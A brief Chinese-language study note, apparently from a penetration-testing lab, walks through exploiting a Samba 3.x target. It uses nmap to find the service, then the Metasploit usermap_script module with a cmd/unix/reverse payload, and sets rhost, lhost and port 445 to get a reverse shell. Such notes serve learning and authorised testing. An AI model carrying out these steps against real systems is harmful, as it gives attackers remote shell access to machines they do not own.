Samba
(1)用nmap扫描靶机是否启动samba服务(Samba3.X)
用工具msf扫描
使用search命令搜索 search samba 并选这合适的漏洞
使用exploit/multi/samba/usermap_script 被标记‘Excellent’,即最杰出且时间最新的,渗透成功率高
使用模块 use exploit/multi/samba/usermap_script
查看可使用的payload
使用cmd/unix/reverse
设置参数
set rhost(目标IP)
set lhost (本机IP)
set rport 445(samba端口)
设置成功后,直接run或exploit都行
信息收集阶段